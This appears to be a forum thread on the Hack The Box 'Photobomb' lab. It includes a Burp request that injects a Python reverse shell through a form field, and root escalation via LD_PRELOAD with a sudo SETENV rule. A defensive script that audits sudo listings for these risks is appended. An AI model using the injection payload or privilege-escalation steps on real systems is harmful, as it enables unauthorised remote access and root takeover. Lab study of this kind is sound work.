October 8, 2022 at 8:49 PM
October 8, 2022 at 8:51 PM

BURP REQUEST FOR SHELL

    POST /printer HTTP/1.1
    Host: photobomb.htb
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 295
    Origin: http://photobomb.htb
    DNT: 1
    Authorization: Basic cEgwdDA6YjBNYiE=
    Connection: close
    Referer: http://photobomb.htb/printer
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1

    photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;export RHOST="YOUR IP";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=600x400

October 8, 2022 at 8:51 PM

any idea for privilege escalation?

October 8, 2022 at 8:54 PM

October 8, 2022 at 8:56 PM

For root: Compile a library that will execute your payload. Then just use LD_PRELOAD, like:

October 8, 2022 at 8:57 PM

October 8, 2022 at 9:02 PM

October 8, 2022 at 9:04 PM

(October 8, 2022, 09:02 PM) yumi Wrote:
    Linux Privilege Escalation using LD_Preload - Hacking Articles

when I try to use the sudo it's asking for the password

October 8, 2022 at 9:08 PM

    Matching Defaults entries for wizard on photobomb:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User wizard may run the following commands on photobomb:
        (root) SETENV: NOPASSWD: /opt/cleanup.sh

no password required

October 8, 2022 at 9:10 PM

(October 8, 2022, 09:04 PM) achillescarter Wrote:
    (October 8, 2022, 09:02 PM) yumi Wrote:
        Linux Privilege Escalation using LD_Preload - Hacking Articles

Save your shell.so in /tmp, then:

    sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh
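
Added example, not part of the thread or any poster's code: a defender-side audit of the `sudo -l` output quoted above that flags rules carrying the SETENV tag, which is what lets a caller pass variables such as LD_PRELOAD into a root command. The second rule in the sample and the function name `audit_sudo_listing` are constructed for illustration.

```python
import re

# Output of `sudo -l` as quoted in the thread, plus one constructed rule
# (/usr/bin/systemctl status) added here for contrast.
SAMPLE = """\
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
    (root) /usr/bin/systemctl status
"""

# A rule line looks like "(runas) TAG: TAG: command".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"([A-Z_]+):\s*")
# Defaults that keep dynamic-loader variables across the sudo boundary.
LOADER_VARS = re.compile(r"env_keep\s*\+?=\s*\"?[^,\n]*\bLD_[A-Z_]+")


def audit_sudo_listing(text):
    """Return (severity, message) findings for environment-related sudo risks."""
    findings = []
    if LOADER_VARS.search(text):
        findings.append(("high", "Defaults env_keep preserves an LD_* loader variable"))
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), []
        # Peel leading tags such as SETENV: and NOPASSWD: off the command.
        while (t := TAG.match(rest)):
            tags.append(t.group(1))
            rest = rest[t.end():]
        if "SETENV" in tags:
            # SETENV lets command-line variables skip env_reset filtering.
            sev = "high" if "NOPASSWD" in tags else "medium"
            findings.append((sev, f"SETENV on '{rest}' as {m.group('runas')}: "
                                  "caller-supplied variables bypass env_reset"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit_sudo_listing(SAMPLE):
        print(f"[{sev}] {msg}")
```

Dropping the SETENV tag from the rule leaves `env_reset` in force for that command, and the audit then reports nothing for it.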

